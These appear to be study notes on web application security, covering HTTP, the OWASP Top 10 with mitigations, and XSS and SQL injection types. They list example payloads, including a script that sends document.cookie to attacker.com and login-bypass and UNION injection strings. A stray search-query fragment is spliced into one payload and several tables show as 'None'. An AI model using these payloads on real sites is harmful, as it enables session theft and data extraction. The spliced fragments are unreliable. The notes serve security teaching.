• Web server: It hosts web apps and handles requests coming from end users (HTTP/HTTPS requests). The web server processes these requests and sends back responses (web pages/data)
  • Web application: It is a software app installed on the server that provides functionality to users through a web browser (E-commerce: Amazon, eBay — Cloud productivity: Microsoft 365, Google Workspace)
  • Web app sec practices: I- Authentication and authorization II- Input validation (preventing SQL injection/XSS by validating all user inputs) III- Secure communication (use HTTPS) IV- Secure coding (follow secure coding standards/best practices to minimize vulnerabilities during app development)
  • Web app sec testing: It evaluates apps to identify vulnerabilities and sec risks before attackers can exploit them
  • I- Vuln scanning: Automated tools scan web apps for known vulnerabilities (SQL injection, XSS) II- Penetration testing: Simulated attacks to exploit vulnerabilities and assess the effectiveness of sec controls III- Code review and static analysis: Manual/automated examination of sur code to identify logic errors and misconfigurations IV- API sec testing: Assessment of APIs to ensure secure authentication, authorization, input validation, and safe data exchange
  • Web apps are built on a client-server model: I- Client side (user interface): It handles user interactions and sends requests to the server through a web browser II- Server side: It receives and processes client requests, executes the app, interacts with DB/ services, and generates responses
  • Web app architecture: I- Client-side (User interaction, responsive UX, JS, and it's the primary lang for dynamic content) II- Server-side (data processing, enhanced sec by code execution on a trusted server, data storage) III- DB IV- APIs and integrations
  • Client-Side Technologies: I- HTML II- CSS III- JS IV- Cookies and local storage
  • Server-Side Technologies: I-Web server (receives and responds to HTTP requests) II- App server (runs business logic and generates dynamic content) III- DB server (stores and manages app data) IV- Scripting lang (handles server-side processing: PHP, Python)
  • Difference Between Client-Side and Server-Side Validation
None
  • Web Request–Response Process (client–server request–response cycle): I- Request → Server: The user's browser sends an HTTP/HTTPS request to the web server II- Server → HTML + JavaScript: The server processes the request and returns an HTML page (including JS, CSS) III- Browser Downloads JS: The browser downloads the JS files referenced in the HTML IV- JS Executes in the Browser: The JS code runs in the browser to handle logic, interactions, and dynamic content V- Web Page Is Rendered: The browser renders the final web page and displays it to the user
  • Anatomy of an HTTP request:
None
HTTP request (details)
  • Accept: the content that the client can understand/display
  • Accept-Encoding: the data compression algorithms used to reduce response size
  • HTTP Response Components:
None
HTTP Response Components
  • OWASP Top 10: A01 — Broken Access Control: User can access data he shouldn't through manipulating in IDOR (Insecure Direct Object Reference) OR robots.txt to expose sensitive paths Mitigation: Implementing RBAC/ABAC to enforce server-side checks on who has access to this part of the data/modification A02 — Cryptographic Failures: Misuse or vuln in the encryption while the data is in transit/at rest Mitigation: Encrypt data in transit and at rest using strong algorithms, secure key management (key rotation, AC), and enforce HTTPS A03 — Injection: Attacker injects malicious commands that the server executes through SQL queries/OS command injection Mitigation: Enforcing the server not to read queries/commands that the user merges with the input, input validation, run services with the least privilege principle A04 — Insecure Design: Missing in the app's architecture Mitigation: Perform threat modeling during the design phase, and adopt secure coding standards A05 — Security Misconfiguration: Systems are left with insecure features through default accounts, and unnecessary services are enabled Mitigation: Enforce secure defaults, disable unused features A06 — Vulnerable and Outdated Components: Using software/libraries with known vulnerabilities Mitigation: Use updated components, monitor Vuln DBs A07 — Identification and Authentication Failures: Weak authentication allows attackers to impersonate users through poor PW policies, missing MFA Mitigation: Enforce strong PWs, use MFA A08 — Software and Data Integrity Failures: An app trusts unverified code through insecure/ unsigned software updates, compromised CI/CD pipelines Mitigation: Verify the integrity of software updates, use digital signatures/checksum verification, and secure CI/CD pipelines with ACs and monitoring A09 — Sec Logging and Monitoring Failures: Incomplete logs, no alerting/ monitoring, lead to a breach Mitigation: Implement centralized logging, monitor critical events/ alerts, and respond to suspicious activity A10 — Server-Side Request Forgery (SSRF): Server is tricked into fetching data from internal/external resources through user input (URLs) Mitigation: Implement allow-list validation for URLs/destinations, disable unnecessary URL fetching features
  • Brute force protection (Prevention): Implement bot-detection/human-verification mechanisms (CAPTCHA) after a certain number of failed login attempts (after two/three failures)
  • Cross-Site Scripting (XSS): It is a vuln that allows attackers to inject malicious client-side scripts (JS) into web pages viewed by other users. These scripts (Bypass access controls, Hijack usr sessions, Steal cookies/tokens, Deface websites)
  • XSS Types: I- Stored (Persistent) XSS: The attacker injects the payload into server-side storage (DB). When a victim visits the affected page, the malicious script executes automatically, Ex: Malicious script saved in a comment section II- Reflected (Non-Persistent) XSS: The payload isn't stored on the server; it's reflected directly from the request into the response and requires user interaction (clicking a malicious link) III. DOM-Based XSS: It runs on the client-side, where a JS modifies the DOM using untrusted input (URL parameters), so the server never sees the attack, and the browser executes it
  • XSS mitigation: I- Input validation II- Implementing Content Security Policies (CSPs) — Restricts where scripts can be loaded from III- Output Encoding — Encode data before rendering it in HTML/JS
  • Common XSS Payloads: I- Basic Script Injection:
<script>alert('XSS')</script>index="botsv1" sourcetype=fgt_utm ("we8105desk" OR "192.168.250.100") 
"downl

II- Image Error Event:

<img src=x onerror=alert('XSS')>

III- Cookie Stealing:

 <script>
 fetch('https://attacker.com/?c=' + document.cookie)
 </script>
  • Where Web App Data Is Stored: I- Server (User ID, auth status logged in/out) → Sessions II- Browser (session ID, Token) → Cookies (User's browser)
  • The actual sensitive data stays on the server, not in the browser
  • Reducing Session Hijacking: Mark authentication cookies as HttpOnly so JS can't access them. So, document.cookie won't return these cookies, preventing attackers from stealing session IDs via XSS
  • The diff between XSS and SQL Injection:
None
  • SQL Injection Types: I- In-band SQL: The attacker uses the same channel to inject malicious SQL and retrieve results. (Error msg: The attacker does DB error msgs and errors reveal DB type/table and column names), (UNION statement: uses the UNION operator to attach a 2nd query to a legitimate one, allowing the attacker to extract usrname/ PW) II- Blind SQL (Inferential): When no DB output is shown, attackers infer info indirectly from the app's behavior. (Boolean-Based: infers data by observing TRUE/FALSE response changes), (Time-Based: uses response delays to determine whether a condition is true) III-Out-of-band SQL: The attacker extracts data by making the DB communicate with an attacker-controlled external server (DNS/HTTP requests) when direct responses are unavailable
  • Common SQL Injection Payloads: I- Basic Authentication Bypass:
' OR '1'='1' -

II- Comment-Based Injection:

' OR 1=1 #

Or

' OR 1=1 --

III- Union-Based Data Extraction:

' UNION SELECT username, password FROM users --' OR 1=1 #

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

[إِنْ أَحْسَنْتَ فَمِنَ اللَّهِ، وَإِنْ أَسْأْتَ فَمِنْ نَفْسِي وَالشَّيْطَانِ — اِذْكُرُونَا فِي صَالِحِ دُعَائِكُمْ]